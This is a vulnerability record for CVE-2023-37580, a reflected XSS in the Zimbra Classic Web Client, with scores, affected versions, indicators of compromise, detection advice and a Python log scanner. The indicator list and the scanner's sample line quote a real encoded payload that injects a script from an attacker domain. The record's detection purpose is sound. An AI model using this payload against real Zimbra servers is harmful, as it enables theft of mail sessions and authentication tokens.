CVE-2023-37580
Published: 2023-07-31

CVE-2023-37580: Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.

Priority: P1 81 · Severity: medium · CVSS 3.1 base score: 6.1
CVSS vector components: AV:N AC:L PR:N UI:R S:C C:L I:L A:N
Badges: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2023-08-17
Exploited in the wild
EPSS: 59.04% (99.0th percentile)

Affected (2 ranges)

Vendor  | Product                    | Version range     | Fixed in
synacor | zimbra_collaboration_suite |                   |
synacor | zimbra_collaboration_suite | >= 8.8.0 < 8.8.15 | 8.8.15

Detection & IOCs (extracted from sources)

url: https://obsorth.opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js
url: https://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js
url: https://applicationdevsoc[.]com/tndgt/auth.js
domain: ntcpk[.]org
domain: obsorth.opwtjnpoc[.]ml
domain: applicationdevsoc[.]com
url: https://mail.REDACTED[.]com/m/momovetost=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyMSCXWyBWJpIos%2Ejs%22%3E%3C%2Fscript%3E%2F%2F
path: /m/momoveto?st=
other: http.favicon.hash:475145467
other: icon_hash="475145467"
  • The XSS is triggered via the `st` parameter in the `/m/momoveto` endpoint of Zimbra Classic Web Client; monitor HTTP requests to this path containing script injection patterns in the `st` parameter.
  • Campaign 4 (Pakistan) exfiltrated Zimbra authentication tokens to ntcpk[.]org; monitor Zimbra server outbound connections to this domain as an indicator of token theft.
  • Most exploitation occurred after the hotfix was pushed to GitHub but before the official patch; monitor for exploitation attempts even on partially-patched or recently-patched instances.
  • The fix for CVE-2023-37580 was to escape the contents of the `st` parameter before it was set as the value in an HTML object; verify this escaping is present in the deployed version.
  • The vulnerability affects Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41; the official patch was released July 25, 2023.
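The monitoring suggested in the first bullet, as an added example that is not part of this record: a Python scan over constructed access-log lines that decodes the `st` parameter of `/m/momoveto` requests and flags HTML/script markers. The Common Log Format layout, the marker list, the function names and the sample lines are assumptions; the encoded payload in the second sample line is copied from the IoC list above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common Log Format request field: "METHOD /path?query HTTP/x.y" (assumed layout)
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers that should never appear in a legitimate `st` value (assumed list).
_INJECTION_MARKERS = ("<script", "</script", "javascript:", "onerror=", "onload=", '"/>', "'/>")

def decode_st(target):
    """Return the fully percent-decoded `st` value for a /m/momoveto request, else None."""
    parts = urlsplit(target)
    if parts.path != "/m/momoveto":
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("st")
    if not values:
        return None
    st = values[0]
    # parse_qs decoded once already; decode again to defeat double-encoded payloads.
    for _ in range(3):
        decoded = unquote(st)
        if decoded == st:
            break
        st = decoded
    return st

def is_suspicious_st(st):
    lowered = st.lower()
    return any(marker in lowered for marker in _INJECTION_MARKERS)

def scan_access_log(lines):
    """Return (line_no, client_ip, decoded_st) for requests that look like CVE-2023-37580 attempts."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQ_RE.search(line)
        if not m:
            continue
        st = decode_st(m.group("target"))
        if st is not None and is_suspicious_st(st):
            hits.append((n, line.split(" ", 1)[0], st))
    return hits

# Constructed sample lines: a benign folder move, then one carrying the encoded payload from the IoC list.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jul/2023:10:01:02 +0000] "GET /m/momoveto?st=message&id=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Jul/2023:10:02:15 +0000] "GET /m/momoveto?st=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyMSCXWyBWJpIos%2Ejs%22%3E%3C%2Fscript%3E%2F%2F HTTP/1.1" 200 512',
]
```

Running `scan_access_log(SAMPLE_LOG)` returns only the second line, with the `st` value decoded to the injected `<script src=...>` tag.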

CVSS provenance

nvd: v3.1, 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck: 6.1 MEDIUM
cisa: 6.1 MEDIUM